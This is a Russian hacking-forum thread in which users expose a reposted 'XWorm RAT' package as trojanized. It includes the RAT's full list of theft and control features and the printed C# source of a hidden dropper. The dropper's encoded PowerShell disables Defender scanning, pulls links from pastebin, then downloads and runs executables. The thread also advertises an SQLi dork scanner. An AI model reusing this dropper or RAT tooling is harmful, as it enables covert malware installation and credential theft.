• XSS.stack #1 – первый литературный журнал от юзеров форума

Разбираем склейки софта от школьников, барыг и вредителей

Отслеживать
Пожалуйста, обратите внимание, что пользователь заблокирован
XWorm RAT v5 - последняя версия приватного RAT под названием XWorm
Компиляция: Загрузите все исходные файлы, запустите билдер и заполните все пункты
Полный контроль всего Windows


Функции:​

  • Builder
  • Startup - Реестр | Путь можно изменить
  • Телеграм бот - Antikill - WDEX - KeyLogger - Clipper - Obfuscator
  • Антианализ - Разносится по USB - Иконка - Assembly
  • Стабильное соединение - Зашифрованное соединение - Зашифрованные строки
  • Проверка порта - Значок можно изменить - Multi Binder
  • FUD Downloader [HTA-VBS-JS-WSF] - BlockClients
  • Информация
  • Мониторинг мыши - клавиатуры - Autosave - Окон
  • Запуск файла - Диск - Ссылка - Память - Скрипт - RunPE
  • Веб камера
  • Микрофон
  • Системные звуки
  • Открыть ссылку [видимый - невидимый]
  • TCP соединения
  • Открытые окна
  • Менеджер запуска
  • Редактор реестра
  • Менеджер процессов
  • Менеджер копипасты
  • Shell
  • Установленные программы
  • DDOS атака
  • VB.Net
  • Менеджер локации [GPS - IP]
  • Файловый менеджер
  • Клиент - Перезапуск - Close - Uninstall - Update - Block - Примечание
  • Питание [Shutdown - Restart - Logoff]
  • Пустой экран [Включить - Отключить]
  • Менеджер задач [Включить - Отключить]
  • Regedit [Включить - Отключить]
  • UAC [Включить - Отключить]
  • Firewall [Включить - Отключить]
  • Windows Update [Включить - Отключить]
  • Invoke-BSOD
  • Bot Killer
  • .Net 3.5 Установка
  • Удалить восстановление
  • Пароли - Файлы cookie - Кредитные карты - Закладки - Загрузки - Ключевые слова - История - Автозаполнение | Chromium
  • Пароли - Файлы cookie - Закладки - История | FireFox
  • Discord Token - ProductKey - InternetExplorer - Filezilla - Wi-Fi
  • Отчет в окне
  • Производительность
  • KeyLogger [Offline - Online]
  • Клиент чат
  • Поиск файлов
  • UAC обход [RunAs - Cmstp]
  • Вымогатель [Encrypt - Decrypt]
  • Reverse Proxy
  • Ngrok установщик
  • HVNC | PowerShell - Explorer | Edge - Brave - Firefox - Chrome | Клон учёток
  • Скрытый RDP
  • WDE
  • WDD
  • Восстановление [пароли - файлы cookie]
  • Обновление всех клиентов

Требования:​

.Net Framework 4.5 [Controller]
.Net Framework 4.0 [Client]


✅ Drag&Drop файлов [File Manager - Monitor - HVNC]
✅ Запуск HVNC в памяти
✅ Copy / Paste текст [HVNC]
✅ Извлечение видео миниатюр [File manager]
✅ Плагины восстановления обновлены
✅ Уязвимость пофиксена
✅ Поддерживать все системы
✅ Изменено название Groub

Свежая версия, более 69 функций в XWorm-RAT V5

Пароль: hack1ngt0ols
XWorm-RAT V3.1:



XWorm RAT V5:
Пароль: hack1ngt0ols
 
Последнее редактирование модератором:
Knew100 сказал(а):
XWorm RAT v5 - последняя версия приватного RAT под названием XWorm
Компиляция: Загрузите все исходные файлы, запустите билдер и заполните все пункты
Полный контроль всего Windows
криво склеено так то... :D:D:D
сам клеил ?
скорее всего сам , ибо зачем перезаливать , да ещё и пароль менять с оригинала ?




Knew100 сказал(а):
Как склеить правильно?:)
пхха ха ха ...
Админ придёт , он научит )))
*****************
Ты сделал перезалив оригинальных файлов с телеги , под своим паролем .
Ты залил это на форум , и даже сам не проверил не запустив не разу данную поделку ?
Данная поделка палится на вирус тотале несколько часов ( посмотри ролик ).
Если бы файлы были бы оригинальными - они бы имели детект от месяца ( по времени ) ,
ибо школьники всё льют туда )
А твоя поделка имеет детект менее суток )
Стало быть это УЖЕ не оригинал )

зы :

889889.jpg


зы 2 : вот оригинальные файлы

889889-2.jpg


ты в оригинале файл "craсk" видишь ?
Вот и я НЕ вижу ) :D:D:D
Кто его туда вложил ?
Давай подумаем , пока Админ не кильнул тебя )
Может это я сделал ? )

Дык любой может скачать твою поделку и убедиться в моих словах )

******************

Твой ход ( коммент/ответ ), школа ) :D:D:D
 

Knew100 пытается протроянить юзеров форума ему бан надо выдать полюбому!​


файл crack.exe в v5 версии выполняет powershell команду

Код: 
    public static void Main() => Process.Start(new ProcessStartInfo()
    {
      FileName = "powershell",
      Arguments = "-EncodedCommand \"PAAjAHcAbgBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbQBpAHMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZwBuAGoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBtAGYAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHUAMQBqAHoAYwBxAHcAegAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAHQAcABqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbAB6AHAAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYgBzAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAG0AcQBoACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAdwB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB3AGIAYwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAZwBtAHkAIwA+AA==\"",
      WindowStyle = ProcessWindowStyle.Hidden,
      CreateNoWindow = true
    });

https://pastebin.com/raw/u1jzcqwz - при запуске crack.exe подгружается то что находится тут и запускается!

ебать ты лось
однозначно бан ему
 
Последнее редактирование:
Dark_TM сказал(а):
файл crack.exe выполняет powershell команду
я о чём и говорю :D :D :D

зы :более того , склейку свою он слепил 6 сентября )
Это видно на видео )

ззы :


Dark_TM сказал(а):
Black.exe
redline stealer :D :D :D

там ещё и кейлогер прилеплен.

блед.. как скучно я живу... :t

Knew100 сказал(а):
Он лежить сейчас
кто бы сомневался ))))

zuzuzu.jpg
 
Bard сказал(а):
я о чём и говорю :D :D :D

зы :более того , склейку свою он слепил 6 сентября )
Это видно на видео )

ззы :



redline stealer :D :D :D

там ещё и кейлогер прилеплен.

блед.. как скучно я живу... :t


кто бы сомневался ))))

Посмотреть вложение 65353
посмотри еще вот тут пожалуйста https://xss.pro/threads/96793/
и вопрос технического характера - как у тебя при таком подходе к анализу не улетают куки, пароли, автофилзы и прочая браузерная шалупень владельцам зловредов?
 
Неожиданный закат карьеры киберлорда из FIN69!

Спасибо, что обратили внимание на склейку: Bard, Dark_TM и c0d3x.
 
Edited сказал(а):
1 - посмотри еще вот тут пожалуйста https://xss.pro/threads/96793/
2 - и вопрос технического характера - как у тебя при таком подходе к анализу не улетают куки, пароли, автофилзы и прочая браузерная шалупень владельцам зловредов?
1 - посмотреть тему не получилось в виду её отсутствия .
2 - ответ технического характера - куки мои ) , а своё не дам ни кому )
идёт анализ "софта" , и до его запуска я уже примерно знаю что этот зловред делает ,
соответственно идём на опережение )
большинство зловредов не запускается на виртуалке , потому всё на живой системе ,
что бы зловред "чувствовал" себя "спокойно" )
повторять сие чревато последствиями , если опыта нет .
 
Bard сказал(а):
1 - посмотреть тему не получилось в виду её отсутствия .
Сорян, пацаны, но я снес практически все линки из его постов (как и многие посты), так как перепроверять все это дерьмо никто и никогда не будет (= нет времени). Я думаю, что его деятельность была продуктивной и стоит его ожидать здесь вскоре под новым ником, так как как минимум два других у него уже здесь были.

Никогда не качайте софт по ссылкам с ФО и любым левым ссылкам ( = источник неизвестен)! А если упоролись и скачали: запускайте только в изолированной виртуалке!
 
Bard сказал(а):
большинство зловредов не запускается на виртуалке , потому всё на живой системе ,
почему бы не сделать виртуалку, максимально похожую на реальный комп? я встречал разные решения для VMWare и Virtualbox.
 
Bard сказал(а):
1 - посмотреть тему не получилось в виду её отсутствия .
2 - ответ технического характера - куки мои ) , а своё не дам ни кому )
идёт анализ "софта" , и до его запуска я уже примерно знаю что этот зловред делает ,
соответственно идём на опережение )
большинство зловредов не запускается на виртуалке , потому всё на живой системе ,
что бы зловред "чувствовал" себя "спокойно" )
повторять сие чревато последствиями , если опыта нет .
это было максимально странно не создавать тему,а распространять склейку через сообщения)
 
ondatra227 сказал(а):
это было максимально странно не создавать тему,а распространять склейку через сообщения)
пользователь был активен в последнее время и создавал очень много тем с различными софтами. Являлись ли они зараженными мы не узнали тк модератор предусмотрительно удалил темы)
хотя у меня есть скачанное из одной, могу скинуть, если кто-то хочет посмотреть
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Аминь.
 
selma сказал(а):
ProxyScrapper2023
вот дура 😁 ...

********************************

admin :





**********************************************************

кошельки крысёныша :

BTC = 'bc1qsazael2a6np6kllk0n6k9uxfhk4kursxwavlmj' # Bitcoin
ETH = '0x1117F19b63E8d6C7bB9C1CC1d3bE3a18d9bce43d' # Ethereum
ETHBEP2 = '0x4edED42be880C1e29a4b48A7c3c7e564f0aD3f63' # Main_Ethereum BEP-2
LTC = 'ltc1q2mx7euakanu3y4ctvlzptw6tp9fz089u4vc6t4' # Litecoin
DASH = 'XnjCZdtsEBCBYDyjvMkP49hbgeduMSRnVU' # Dash
DOGE = 'DUTPubuzryoGqYN28LL8YqhBt2hbVQL4it' # Dogecoin
RIPPLE = '' # Ripple
TRON = 'TXoU5cw53DdmrKVpWJLDnurKFcTZn1a2Fe' # Tron
BTCCASH = 'bitcoincash:qq6wpufeyzej4cer0msx6hlcpd6977aswgt4tg6346' # MainBitcoincash
 
Пожалуйста, обратите внимание, что пользователь заблокирован
софт из тгк Deanon Club

Dork searcher Cr7, также известный как «Google dorks parser», — это инструмент, который автоматизирует поиск в поисковых системах уязвимых списков сайтов SQLi с помощью Yahoo/Teoma/Bing/MyWebSearch/AOL/Ask/WOW/DockDockGo/StartPage. Dork searcher Cr7 Этот инструмент полезен для автоматизации сканирования URL-адресов SQLi с помощью dorks

<здесь была ссылка на зараженный софт, удалена модератором>

пароль: 1
он в текстовом документе есть
 
Последнее редактирование модератором:
EXXX0RCIST сказал(а):
софт из тгк Deanon Club

Dork searcher Cr7, также известный как «Google dorks parser», — это инструмент, который автоматизирует поиск в поисковых системах уязвимых списков сайтов SQLi с помощью Yahoo/Teoma/Bing/MyWebSearch/AOL/Ask/WOW/DockDockGo/StartPage. Dork searcher Cr7 Этот инструмент полезен для автоматизации сканирования URL-адресов SQLi с помощью dorks
Поговаривают,что к запароленным архивам, пароль потрiбен.
А с другой стороны, все мы понимаем для чего там пароль).
Еще и с такого ущербного канала, как и его не менее ущербные владельцы / публикаторы.
 
Последнее редактирование модератором:
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх